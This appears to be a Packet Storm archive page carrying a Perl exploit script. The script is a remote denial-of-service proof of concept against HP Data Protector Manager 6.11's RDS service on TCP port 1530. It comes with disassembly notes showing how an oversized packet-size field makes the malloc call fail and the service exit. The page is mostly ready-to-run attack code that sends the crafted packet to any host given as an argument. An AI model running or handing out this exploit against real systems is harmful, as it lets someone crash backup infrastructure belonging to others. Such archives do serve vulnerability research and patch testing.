what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

HP Data Protector Manager 6.11 Denial Of Service

HP Data Protector Manager 6.11 Denial Of Service
Posted Jan 8, 2011
Authored by Pepelux, Roi Mallo

HP Data Protector Manager version 6.11 remote denial of service exploit.

tags | exploit, remote, denial of service
SHA-256 | 3589724eb2375aceb76e69a3c77d8eeebe728b528ecbb0e3674b17dfc345d2f4

HP Data Protector Manager 6.11 Denial Of Service

Change Mirror Download
#!/usr/bin/perl

# ===============================
# HP Data Protector Manager v6.11
# ===============================
#
# Bug: Remote Denial of Service Vulnerabilities (RDS Service)
#
# Software: http://h71028.www7.hp.com/enterprise/w1/en/software/information-management-data-protector.html
# Date: 08/01/2011
# Authors: Roi Mallo - rmallof[AT]gmail[DOT]com
# http://elotrolad0.blogspot.com/ - http://twitter.com/rmallof
# Pepelux - pepelux[AT]enye-sec[DOT]com
# http://www.enye-sec.org - http://www.pepelux.org - http://twitter.com/pepeluxx
#
# Vulnerable file: Program Files\OmniBack\rds.exe
#
# Tested on Windows XP SP2 && Windows XP SP3
#
#
# POC:
# _ncp32.dll is the responsable of waiting the packet (RECV)
# when a packet is received, it uses _rm32.dll to allocating memory,
# as the size is too big, malloc can't allocate this size and the program exit.
#
# _ncp32.dll
# 00482F92 68 7DFAF908 PUSH 8F9FA7D
# 00482F97 6A 00 PUSH 0
# 00482F99 6A 01 PUSH 1
# 00482F9B 6A 00 PUSH 0
# 00482F9D 8B55 F8 MOV EDX,DWORD PTR SS:[EBP-8] ; packet size (64000000h)
# 00482FA0 52 PUSH EDX
# 00482FA1 E8 9C2D0000 CALL <JMP.&_rm32.#20_rm_getMem>
#
#
# _rm32.dll
# 0038C49B 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] : packet size (64000000h)
# 0038C49E 83C0 08 ADD EAX,8
# 0038C4A1 50 PUSH EAX
# 0038C4A2 FF15 F4733A00 CALL DWORD PTR DS:[<&MSVCR71.malloc>] ; MSVCR71.malloc --> Returns 0 because no space available
# ......
# 0038C5F9 50 PUSH EAX
# 0038C5FA 68 2C0C3A00 PUSH _rm32.003A0C2C ; ASCII "rm_getMem: out of memory, allocating %u bytes. Called from %s"
#......
# 0038C64E E8 8D220000 CALL _rm32.rm_errorExit



use IO::Socket;

my ($server, $port) = @ARGV ;

unless($ARGV[0] || $ARGV[1]) {
print "Usage: perl $0 <host> [port]\n";
print "\tdefault port = 1530\n\n";
exit 1;
}

$port = 1530 if !($ARGV[1]);


if ($^O =~ /Win/) {system("cls");}else{system("clear");}

my $buf = "\x23\x8c\x29\xb6"; # header (always the same)
$buf .= "\x64\x00\x00\x00"; # data packet size (too big)
$buf .= "\x41"x4; # data

print "[+] Connecting to $server:$port ...\n";

my $sock1 = new IO::Socket::INET (PeerAddr => $server, PeerPort => $port, Timeout => '10', Proto => 'tcp') or die("Server $server is not available.\n");

print "[+] Sending malicious packet ...\n";
print $sock1 "$buf";
print "\n[x] Server crashed!\n";
exit;

Login or Register to add favorites

File Archive:

June 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    0 Files
  • 2
    Jun 2nd
    0 Files
  • 3
    Jun 3rd
    18 Files
  • 4
    Jun 4th
    21 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    57 Files
  • 7
    Jun 7th
    6 Files
  • 8
    Jun 8th
    0 Files
  • 9
    Jun 9th
    0 Files
  • 10
    Jun 10th
    12 Files
  • 11
    Jun 11th
    27 Files
  • 12
    Jun 12th
    38 Files
  • 13
    Jun 13th
    16 Files
  • 14
    Jun 14th
    14 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    16 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    0 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close